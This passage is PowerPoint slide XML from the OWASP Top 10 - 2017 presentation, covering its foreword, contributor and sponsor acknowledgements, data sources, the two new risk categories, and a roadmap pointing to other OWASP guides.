                        <a:t>We hope that the OWASP Top 10 is useful to your application security efforts. Please don't hesitate to contact OWASP with your questions, comments, and ideas at our GitHub project repository:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1270">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>You can find the OWASP Top 10 project and translations here:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" indent="-82550">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1270">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lastly, we wish to thank the founding leadership of the OWASP Top 10 project, Dave Wichers and Jeff Williams, for all their efforts, and believing in us to get this finished with the community's help. Thank you!</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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew van der Stock</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a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian Glas</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a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>e</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kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten Gigler</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea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8516">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sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Project</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> Sponsorship</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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890284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1400397">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:b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b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Thanks to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hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Autodesk</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for sponsoring the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 - 2017.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="60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Organizations and individuals that have provided vulnerability prevalence data or other assistance are listed on the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hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Acknowledgements page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525440266"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>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FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Foreword</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872923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006EF41C-22F0-4CD0-98DC-529189A47945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2846313228"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990599"/>
          <a:ext cx="6858000" cy="8291511"/>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41041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Welcome to the OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2017! </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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950470">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This major update adds several new issues, including two issues selected by the community - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Two key differentiators from previous OWASP Top 10 releases are the substantial community feedback and extensive data assembled from dozens of organizations, possibly the largest amount of data ever assembled in the preparation of an application security standard. This provides us with confidence that the new OWASP Top 10 addresses the most impactful application security risks currently facing organizations.</a:t>
                      </a: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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The OWASP Top 10 - 2017 is based primarily on 40+ data submissions from firms that specialize in application security and an industry survey that was</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> completed by over 500 individuals</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. This data spans vulnerabilities gathered from hundreds of organizations and over 100,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">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029621535"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3810000"/>
          <a:ext cx="3352800" cy="5329140"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="324000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Roadmap for future activities</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34"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4993860">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Don't stop at 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. There are hundreds of issues that could affect the overall security of a web application as discussed in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Developer's Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheet Series</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. The OWASP Top 10 will continue to change. Even without changing a single line of your application's code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in What's Next For </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Developers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Security Testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Application Managers </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>for more information.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>When you're ready to stop chasing vulnerabilities and focus on establishing strong application security controls, the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>OWASP Proactive Controls </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>project provides a starting point to help developers build security into their application and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
